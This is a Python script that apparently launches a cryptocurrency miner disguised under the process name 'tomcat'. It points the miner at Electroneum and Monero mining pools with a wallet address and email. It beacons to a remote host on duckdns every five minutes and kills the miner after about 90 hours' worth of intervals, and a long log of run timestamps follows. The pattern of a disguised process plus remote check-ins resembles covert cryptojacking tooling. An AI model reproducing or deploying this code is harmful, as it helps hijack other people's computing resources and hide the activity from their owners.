import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:09:04.108792
#2018-02-17 15:56:06.643265
#2018-02-17 17:44:07.412755
#2018-02-17 19:32:05.318242
#2018-02-17 21:21:03.422613
#2018-02-17 23:05:08.777385
#2018-02-18 00:53:01.348711
#2018-02-18 02:41:05.235143
#2018-02-18 04:29:04.236905
#2018-02-18 06:19:06.962905
#2018-02-18 08:09:04.232429
#2018-02-18 09:56:01.365018
#2018-02-18 11:43:06.675376
#2018-02-18 13:28:03.866218
#2018-02-18 15:18:07.255854
#2018-02-18 17:06:08.260875
#2018-02-18 18:53:06.157639
#2018-02-18 20:41:07.249608
#2018-02-18 22:26:04.735960
#2018-02-19 00:16:01.735690
#2018-02-19 02:02:03.874895
#2018-02-19 03:48:04.385410
#2018-02-19 05:32:03.302136
#2018-02-19 07:21:06.866356
#2018-02-19 09:09:06.380365
#2018-02-19 10:58:02.140191
#2018-02-19 12:46:01.619150
#2018-02-19 14:33:08.637001
#2018-02-19 16:21:01.466115
#2018-02-19 18:07:09.408500
#2018-02-19 19:54:01.996908
#2018-02-19 21:41:01.423664
#2018-02-19 23:27:07.789550
#2018-02-20 01:13:04.613451
#2018-02-20 03:03:07.758012
#2018-02-20 04:51:05.056132
#2018-02-20 06:34:01.936867
#2018-02-20 08:18:07.285604
#2018-02-20 10:03:05.759912
#2018-02-20 11:47:09.157265
#2018-02-20 13:35:09.701131
#2018-02-20 15:19:06.752210
#2018-02-20 17:04:05.933217
#2018-02-20 18:51:09.523137
#2018-02-20 20:41:02.099849
#2018-02-20 22:24:08.887148
#2018-02-21 00:07:02.147423
#2018-02-21 01:52:06.124196
#2018-02-21 03:39:06.397737
#2018-02-21 05:28:06.185841
#2018-02-21 07:17:01.672370
#2018-02-21 09:01:05.865331
#2018-02-21 10:49:06.853943
#2018-02-21 12:35:07.835194
#2018-02-21 14:21:01.439843
#2018-02-21 16:10:08.322819
#2018-02-21 18:02:01.339148
#2018-02-21 19:48:07.570723
#2018-02-21 21:34:06.708640
#2018-02-21 23:19:03.513475
#2018-02-22 01:09:08.073442
#2018-02-22 02:57:08.521550
#2018-02-22 04:44:04.856120
#2018-02-22 06:28:02.046677
#2018-02-22 08:15:04.748655
#2018-02-22 10:04:04.712976
#2018-02-22 11:48:18.670457
#2018-02-22 13:34:02.200377
#2018-02-22 15:22:01.456720
#2018-02-22 17:09:10.251533
#2018-02-22 18:55:09.044363
#2018-02-22 20:46:08.407883
#2018-02-22 22:31:06.260054
#2018-02-23 01:14:07.183216
#2018-02-23 03:01:06.212605
#2018-02-23 04:48:06.029415
#2018-02-23 06:36:01.645769
#2018-02-23 08:24:04.513622
#2018-02-23 10:40:06.068880
#2018-02-23 12:34:05.896668
#2018-02-23 14:20:08.126403
#2018-02-23 16:11:08.402501
#2018-02-23 17:57:02.194009
#2018-02-23 19:43:04.852015
#2018-02-23 21:27:01.977151
#2018-02-23 23:14:04.478957
#2018-02-24 01:06:04.020099
#2018-02-24 02:58:05.284908
#2018-02-24 04:46:03.399671
#2018-02-24 06:32:03.342317
#2018-02-24 08:20:08.270484
#2018-02-24 10:04:06.315356
#2018-02-24 12:02:04.017985
#2018-02-24 13:49:03.572121
#2018-02-24 15:31:06.841745
#2018-02-24 17:26:07.045559
#2018-02-24 19:13:06.086758
#2018-02-24 21:58:05.524276
#2018-02-25 02:29:03.725388
#2018-02-25 06:08:06.478422
#2018-02-25 11:38:03.621266